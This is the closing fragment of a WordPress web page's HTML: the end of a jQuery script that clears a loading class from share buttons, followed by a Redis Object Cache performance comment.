powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
},
error: function() {
// Remove Loading Class.
powerkitButtonsBox.removeClass( 'pk-share-buttons-loading' );
}
});
});
});
})(jQuery);
</script>
</body>
</html>
<!--
Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com
Retrieved 5967 objects (1 MB) from Redis using PhpRedis (v6.2.0).
-->